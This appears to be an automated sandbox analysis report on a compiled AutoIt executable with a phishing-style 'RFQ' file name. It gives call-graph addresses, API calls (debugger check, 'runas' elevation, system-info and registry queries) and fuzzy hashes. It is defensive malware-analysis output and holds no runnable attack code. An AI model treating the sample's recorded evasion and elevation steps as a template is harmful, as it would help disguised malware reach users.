86322->86317 86323 4530c9 VariantClear 86322->86323 86327 45308a 53 API calls 86322->86327 86328 470870 52 API calls 86322->86328 86329 457f66 87 API calls __write_nolock 86322->86329 86330 472f47 127 API calls 86322->86330 86323->86322 86324->86017 86325->86021 86326->86322 86327->86322 86328->86322 86329->86322 86330->86322 86331->86296 86332->86296 86333->86320 86334->86306 86335->86037 86336->86040 86337->86058 86338->86056 86339->86045 86340->86062 86341->86091 86342->86062 86343->86093 86344->86062 86345->86093 86346->86075 86347->86093 86348->86078 86349->86093 86350->86093 86351->86073 86353 4289d2 86352->86353 86354 408db3 86352->86354 86382 45e737 90 API calls 3 library calls 86353->86382 86380 40bec0 90 API calls 86354->86380 86357 408dc9 86358 4289e5 86357->86358 86361 428a05 86357->86361 86363 40a780 194 API calls 86357->86363 86364 408e64 86357->86364 86366 408f40 VariantClear 86357->86366 86367 408e5a 86357->86367 86381 40ba10 52 API calls 2 library calls 86357->86381 86383 45e737 90 API calls 3 library calls 86358->86383 86362 408f40 VariantClear 86361->86362 86362->86367 86363->86357 86365 408f40 VariantClear 86364->86365 86365->86367 86366->86357 86367->86098 86369 408f40 VariantClear 86368->86369 86370 403d20 86369->86370 86371 403cd0 VariantClear 86370->86371 86372 403d4d 86371->86372 86384 46e91c 86372->86384 86387 467897 86372->86387 86431 45e17d 86372->86431 86441 4755ad 86372->86441 86373 403d76 86373->86096 86373->86107 86378->86096 86379->86099 86380->86357 86381->86357 86382->86358 86383->86361 86444 46e785 86384->86444 86386 46e92f 86386->86373 86388 4678bb 86387->86388 86420 467954 86388->86420 86546 45340c 85 API calls 86388->86546 86389 4115d7 52 API calls 86390 467989 86389->86390 86392 467995 86390->86392 86550 40da60 53 API calls 86390->86550 86396 4533eb 85 API calls 86392->86396 86393 4678f6 86395 413a0e __wsplitpath 46 API calls 86393->86395 86397 4678fc 86395->86397 86398 4679b7 86396->86398 86399 401b10 52 API calls 86397->86399 86400 40de40 60 API calls 86398->86400 86401 46790c 86399->86401 86403 4679c3 86400->86403 86547 40d200 52 API calls 2 library calls 86401->86547 86404 4679c7 GetLastError 86403->86404 86405 467a05 86403->86405 86407 403cd0 VariantClear 86404->86407 86410 467a2c 86405->86410 86411 467a4b 86405->86411 86406 467917 86406->86420 86548 4339fa GetFileAttributesW FindFirstFileW FindClose 86406->86548 86408 4679dc 86407->86408 86412 4679e6 86408->86412 86416 44ae3e CloseHandle 86408->86416 86415 4115d7 52 API calls 86410->86415 86413 4115d7 52 API calls 86411->86413 86419 408f40 VariantClear 86412->86419 86417 467a49 86413->86417 86414 467928 86418 46792f 86414->86418 86414->86420 86422 467a31 86415->86422 86416->86412 86426 408f40 VariantClear 86417->86426 86549 4335cd 56 API calls 3 library calls 86418->86549 86425 4679ed 86419->86425 86420->86389 86421 467964 86420->86421 86421->86373 86551 436299 52 API calls 2 library calls 86422->86551 86425->86373 86428 467a88 86426->86428 86427 467939 86427->86420 86429 408f40 VariantClear 86427->86429 86428->86373 86430 467947 86429->86430 86430->86420 86432 45e198 86431->86432 86433 45e19c 86432->86433 86434 45e1b8 86432->86434 86435 408f40 VariantClear 86433->86435 86436 45e1cc 86434->86436 86437 45e1db FindClose 86434->86437 86438 45e1a4 86435->86438 86439 45e1d9 moneypunct 86436->86439 86440 44ae3e CloseHandle 86436->86440 86437->86439 86438->86373 86439->86373 86440->86439 86552 475077 86441->86552 86443 4755c0 86443->86373 86445 46e7a2 86444->86445 86446 4115d7 52 API calls 86445->86446 86449 46e802 86445->86449 86447 46e7ad 86446->86447 86448 46e7b9 86447->86448 86492 40da60 53 API calls 86447->86492 86493 4533eb 86448->86493 86450 46e7e5 86449->86450 86457 46e82f 86449->86457 86452 408f40 VariantClear 86450->86452 86454 46e7ea 86452->86454 86454->86386 86456 46e8b5 86485 4680ed 86456->86485 86457->86456 86460 46e845 86457->86460 86463 4533eb 85 API calls 86460->86463 86462 46e8bb 86489 443fbe 86462->86489 86472 46e84b 86463->86472 86464 46e7db 86464->86450 86509 44ae3e 86464->86509 86465 46e87a 86512 4689f4 59 API calls 86465->86512 86469 46e883 86471 4013c0 52 API calls 86469->86471 86473 46e88f 86471->86473 86472->86465 86472->86469 86475 40e0a0 52 API calls 86473->86475 86474 408f40 VariantClear 86483 46e881 86474->86483 86476 46e899 86475->86476 86513 40d200 52 API calls 2 library calls 86476->86513 86478 46e911 86478->86386 86479 46e8a5 86514 4689f4 59 API calls 86479->86514 86482 46e903 86484 44ae3e CloseHandle 86482->86484 86483->86478 86515 40da20 86483->86515 86484->86478 86486 468100 86485->86486 86487 4680fa 86485->86487 86486->86462 86519 467ac4 55 API calls 2 library calls 86487->86519 86520 443e36 86489->86520 86491 443fd3 86491->86474 86491->86483 86492->86448 86494 453404 86493->86494 86495 4533f8 86493->86495 86497 40de40 86494->86497 86495->86494 86527 4531b1 85 API calls 5 library calls 86495->86527 86498 40da20 CloseHandle 86497->86498 86499 40de4e 86498->86499 86528 40f110 86499->86528 86502 4264fa 86504 40de84 86537 40e080 SetFilePointerEx SetFilePointerEx 86504->86537 86506 40de8b 86538 40f160 SetFilePointerEx SetFilePointerEx WriteFile 86506->86538 86508 40de90 86508->86457 86508->86464 86510 44ae4b moneypunct 86509->86510 86540 443fdf 86509->86540 86510->86450 86512->86483 86513->86479 86514->86483 86516 40da37 86515->86516 86517 40da29 86515->86517 86516->86517 86518 40da3c CloseHandle 86516->86518 86517->86482 86518->86482 86519->86486 86523 443e19 86520->86523 86524 443e26 86523->86524 86525 443e32 WriteFile 86523->86525 86526 443db4 SetFilePointerEx SetFilePointerEx 86524->86526 86525->86491 86526->86525 86527->86494 86529 40f125 CreateFileW 86528->86529 86530 42630c 86528->86530 86532 40de74 86529->86532 86531 426311 CreateFileW 86530->86531 86530->86532 86531->86532 86533 426337 86531->86533 86532->86502 86536 40dea0 55 API calls moneypunct 86532->86536 86539 40df90 SetFilePointerEx SetFilePointerEx 86533->86539 86535 426342 86535->86532 86536->86504 86537->86506 86538->86508 86539->86535 86541 40da20 CloseHandle 86540->86541 86542 443feb 86541->86542 86546->86393 86547->86406 86548->86414 86549->86427 86550->86392 86551->86417 86553 4533eb 85 API calls 86552->86553 86554 4750b8 86553->86554 86555 4750ee 86554->86555 86556 475129 86554->86556 86558 408f40 VariantClear 86555->86558 86605 4646e0 86556->86605 86563 4750f5 86558->86563 86559 47515e 86560 475162 86559->86560 86592 47518e 86559->86592 86561 408f40 VariantClear 86560->86561 86594 475169 86561->86594 86562 475357 86564 475365 86562->86564 86565 4754ea 86562->86565 86563->86443 86639 44b3ac 57 API calls 86564->86639 86645 464812 92 API calls 86565->86645 86569 4754fc 86570 475374 86569->86570 86572 475508 86569->86572 86618 430d31 86570->86618 86571 4533eb 85 API calls 86571->86592 86574 408f40 VariantClear 86572->86574 86577 47550f 86574->86577 86575 475388 86625 4577e9 86575->86625 86577->86594 86579 47539e 86633 410cfc 86579->86633 86580 475480 86582 408f40 VariantClear 86580->86582 86582->86594 86590 4754b5 86591 408f40 VariantClear 86590->86591 86591->86594 86592->86562 86592->86571 86592->86580 86592->86590 86637 436299 52 API calls 2 library calls 86592->86637 86638 463ad5 64 API calls __wcsicoll 86592->86638 86594->86443 86648 4536f7 53 API calls 86605->86648 86607 4646fc 86649 4426cd 59 API calls _wcslen 86607->86649 86609 464711 86611 40bc70 52 API calls 86609->86611 86617 46474b 86609->86617 86612 46472c 86611->86612 86650 461465 52 API calls _memmove 86612->86650 86614 464741 86616 40c600 52 API calls 86614->86616 86615 464793 86615->86559 86616->86617 86617->86615 86651 463ad5 64 API calls __wcsicoll 86617->86651 86619 430db2 86618->86619 86620 430d54 86618->86620 86619->86575 86621 4115d7 52 API calls 86620->86621 86622 430d74 86621->86622 86623 430da9 86622->86623 86624 4115d7 52 API calls 86622->86624 86623->86575 86624->86622 86626 457a84 86625->86626 86632 45780c _strcat moneypunct _wcslen _wcscpy 86625->86632 86626->86579 86627 443006 57 API calls 86627->86632 86628 45340c 85 API calls 86628->86632 86630 4135bb 46 API calls _malloc 86630->86632 86631 40f6f0 54 API calls 86631->86632 86632->86626 86632->86627 86632->86628 86632->86630 86632->86631 86652 44b3ac 57 API calls 86632->86652 86637->86592 86638->86592 86639->86570 86645->86569 86648->86607 86649->86609 86650->86614 86651->86615 86652->86632 86653->86117 86654->86212 86655->86130 86656->86177 86657->86242 86658->86177 86659->86177 86660->86151 86661->86176 86662->86142 86663->86146 86664->86152 86665->86206 86666->86206 86667->86206 86668->86165 86669->86132 86670->86172 86671->86198 86672->86220 86673->86220 86674->86212 86675->86224 86676->86239 86677->86232 86678->86237 86679->86245 86680->86245 86681->86132 86682->86136 86683 42d154 86687 480a8d 86683->86687 86685 42d161 86686 480a8d 194 API calls 86685->86686 86686->86685 86688 480ae4 86687->86688 86689 480b26 86687->86689 86691 480aeb 86688->86691 86692 480b15 86688->86692 86690 40bc70 52 API calls 86689->86690 86713 480b2e 86690->86713 86694 480aee 86691->86694 86695 480b04 86691->86695 86720 4805bf 194 API calls 86692->86720 86694->86689 86697 480af3 86694->86697 86719 47fea2 194 API calls __itow_s 86695->86719 86718 47f135 194 API calls 86697->86718 86698 40e0a0 52 API calls 86698->86713 86701 408f40 VariantClear 86703 481156 86701->86703 86702 480aff 86702->86701 86705 408f40 VariantClear 86703->86705 86704 40c2c0 52 API calls 86704->86713 86706 48115e 86705->86706 86706->86685 86707 401980 53 API calls 86707->86713 86709 40e710 53 API calls 86709->86713 86710 408e80 VariantClear 86710->86713 86711 40a780 194 API calls 86711->86713 86713->86698 86713->86702 86713->86704 86713->86707 86713->86709 86713->86710 86713->86711 86716 480ff5 86713->86716 86721 45377f 52 API calls 86713->86721 86722 45e951 53 API calls 86713->86722 86723 40e830 53 API calls 86713->86723 86724 47925f 53 API calls 86713->86724 86725 47fcff 194 API calls 86713->86725 86726 45e737 90 API calls 3 library calls 86716->86726 86718->86702 86719->86702 86720->86702 86721->86713 86722->86713 86723->86713 86724->86713 86725->86713 86726->86702 86727 42b14b 86734 40bc10 86727->86734 86729 42b159 86730 4096a0 331 API calls 86729->86730 86731 42b177 86730->86731 86745 44b92d VariantClear 86731->86745 86733 42bc5b 86735 40bc24 86734->86735 86736 40bc17 86734->86736 86738 40bc2a 86735->86738 86739 40bc3c 86735->86739 86737 408e80 VariantClear 86736->86737 86740 40bc1f 86737->86740 86741 408e80 VariantClear 86738->86741 86742 4115d7 52 API calls 86739->86742 86740->86729 86743 40bc33 86741->86743 86744 40bc43 86742->86744 86743->86729 86744->86729 86745->86733 86746 425b2b 86751 40f000 86746->86751 86750 425b3a 86752 4115d7 52 API calls 86751->86752 86753 40f007 86752->86753 86754 4276ea 86753->86754 86760 40f030 86753->86760 86759 41130a 51 API calls __cinit 86759->86750 86761 40f039 86760->86761 86762 40f01a 86760->86762 86790 41130a 51 API calls __cinit 86761->86790 86764 40e500 86762->86764 86765 40bc70 52 API calls 86764->86765 86766 40e515 GetVersionExW 86765->86766 86767 402160 52 API calls 86766->86767 86768 40e557 86767->86768 86791 40e660 86768->86791 86774 427674 86777 4276c6 GetSystemInfo 86774->86777 86776 40e5cd GetCurrentProcess 86812 40ef20 LoadLibraryA GetProcAddress 86776->86812 86779 4276d5 GetSystemInfo 86777->86779 86780 40e5e0 86780->86779 86805 40efd0 86780->86805 86783 40e629 86809 40ef90 86783->86809 86786 40e641 FreeLibrary 86787 40e644 86786->86787 86788 40e653 FreeLibrary 86787->86788 86789 40e656 86787->86789 86788->86789 86789->86759 86790->86762 86792 40e667 86791->86792 86793 42761d 86792->86793 86794 40c600 52 API calls 86792->86794 86795 40e55c 86794->86795 86796 40e680 86795->86796 86797 40e687 86796->86797 86798 427616 86797->86798 86799 40c600 52 API calls 86797->86799 86800 40e566 86799->86800 86800->86774 86801 40ef60 86800->86801 86802 40e5c8 86801->86802 86803 40ef66 LoadLibraryA 86801->86803 86802->86776 86802->86780 86803->86802 86804 40ef77 GetProcAddress 86803->86804 86804->86802 86806 40e620 86805->86806 86807 40efd6 LoadLibraryA 86805->86807 86806->86777 86806->86783 86807->86806 86808 40efe7 GetProcAddress 86807->86808 86808->86806 86813 40efb0 LoadLibraryA GetProcAddress 86809->86813 86811 40e632 GetNativeSystemInfo 86811->86786 86811->86787 86812->86780 86813->86811 86814 40b3ca0 86828 40b18f0 86814->86828 86816 40b3d50 86831 40b3b90 86816->86831 86830 40b1f7b 86828->86830 86834 40b4d80 GetPEB 86828->86834 86830->86816 86832 40b3b99 Sleep 86831->86832 86833 40b3ba7 86832->86833 86834->86830 86835 425b5e 86840 40c7f0 86835->86840 86839 425b6d 86875 40db10 52 API calls 86840->86875 86842 40c82a 86876 410ab0 6 API calls 86842->86876 86844 40c86d 86845 40bc70 52 API calls 86844->86845 86846 40c877 86845->86846 86847 40bc70 52 API calls 86846->86847 86848 40c881 86847->86848 86849 40bc70 52 API calls 86848->86849 86850 40c88b 86849->86850 86851 40bc70 52 API calls 86850->86851 86852 40c8d1 86851->86852 86853 40bc70 52 API calls 86852->86853 86854 40c991 86853->86854 86877 40d2c0 52 API calls 86854->86877 86856 40c99b 86878 40d0d0 53 API calls 86856->86878 86858 40c9c1 86859 40bc70 52 API calls 86858->86859 86860 40c9cb 86859->86860 86879 40e310 53 API calls 86860->86879 86862 40ca28 86863 408f40 VariantClear 86862->86863 86864 40ca30 86863->86864 86865 408f40 VariantClear 86864->86865 86866 40ca38 GetStdHandle 86865->86866 86867 429630 86866->86867 86868 40ca87 86866->86868 86867->86868 86869 429639 86867->86869 86874 41130a 51 API calls __cinit 86868->86874 86880 4432c0 57 API calls 86869->86880 86871 429641 86881 44b6ab CreateThread 86871->86881 86873 42964f CloseHandle 86873->86868 86874->86839 86875->86842 86876->86844 86877->86856 86878->86858 86879->86862 86880->86871 86881->86873 86882 44b5cb 58 API calls 86881->86882 86883 425b6f 86888 40dc90 86883->86888 86887 425b7e 86889 40bc70 52 API calls 86888->86889 86890 40dd03 86889->86890 86897 40f210 86890->86897 86892 426a97 86894 40dd96 86894->86892 86895 40ddb7 86894->86895 86900 40dc00 52 API calls 2 library calls 86894->86900 86896 41130a 51 API calls __cinit 86895->86896 86896->86887 86901 40f250 RegOpenKeyExW 86897->86901 86899 40f230 86899->86894 86900->86894 86902 425e17 86901->86902 86903 40f275 RegQueryValueExW 86901->86903 86902->86899 86904 40f2c3 RegCloseKey 86903->86904 86905 40f298 86903->86905 86904->86899 86906 40f2a9 RegCloseKey 86905->86906 86907 425e1d 86905->86907 86906->86899

                                                        Executed Functions

                                                        Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 004096C1
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • _memmove.LIBCMT ref: 0040970C
                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                        • _memmove.LIBCMT ref: 00409D96
                                                        • _memmove.LIBCMT ref: 0040A6C4
                                                        • _memmove.LIBCMT ref: 004297E5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                        • String ID:
                                                        • API String ID: 2383988440-0
                                                        • Opcode ID: 61c812ab78ec8123d4a89a7fe2278c57d0701dd771e1b89e3840c97f703fb0a2
                                                        • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                        • Opcode Fuzzy Hash: 61c812ab78ec8123d4a89a7fe2278c57d0701dd771e1b89e3840c97f703fb0a2
                                                        • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                        Function 0040D590 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                          • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,00000104,?), ref: 00401F4C
                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                          • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                        • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                        • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                          • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                        • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                        • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                          • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                          • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                          • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                          • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                          • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                          • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                          • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                          • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                          • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                        • String ID: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                        • API String ID: 2495805114-2974685841
                                                        • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                        • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                        • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                        • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                        Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1915 40e585-40e596 1913->1915 1916 40e5ba-40e5cb call 40ef60 1913->1916 1917 427683-427686 1914->1917 1918 42767b-427681 1914->1918 1920 427625-427629 1915->1920 1921 40e59c-40e59f 1915->1921 1935 40e5ec-40e60c 1916->1935 1936 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1916->1936 1922 427693-427696 1917->1922 1923 427688-427691 1917->1923 1919 4276b4-4276be 1918->1919 1937 4276c6-4276ca GetSystemInfo 1919->1937 1929 427636-427640 1920->1929 1930 42762b-427631 1920->1930 1925 40e5a5-40e5ae 1921->1925 1926 427654-427657 1921->1926 1922->1919 1927 427698-4276a8 1922->1927 1923->1919 1931 40e5b4 1925->1931 1932 427645-42764f 1925->1932 1926->1916 1938 42765d-42766f 1926->1938 1933 4276b0 1927->1933 1934 4276aa-4276ae 1927->1934 1929->1916 1930->1916 1931->1916 1932->1916 1933->1919 1934->1919 1940 40e612-40e623 call 40efd0 1935->1940 1941 4276d5-4276df GetSystemInfo 1935->1941 1936->1935 1948 40e5e8 1936->1948 1937->1941 1938->1916 1940->1937 1945 40e629-40e63f call 40ef90 GetNativeSystemInfo 1940->1945 1950 40e641-40e642 FreeLibrary 1945->1950 1951 40e644-40e651 1945->1951 1948->1935 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                        • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                        • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                        • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                        • String ID: 0SH
                                                        • API String ID: 3363477735-851180471
                                                        • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                        • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                        • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                        • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                        Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                        • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: IsThemeActive$uxtheme.dll
                                                        • API String ID: 2574300362-3542929980
                                                        • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                        • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                        • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                        • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                        Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                        • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                        • TranslateMessage.USER32(?), ref: 00409556
                                                        • DispatchMessageW.USER32(?), ref: 00409561
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Message$Peek$DispatchSleepTranslate
                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                        • API String ID: 1762048999-758534266
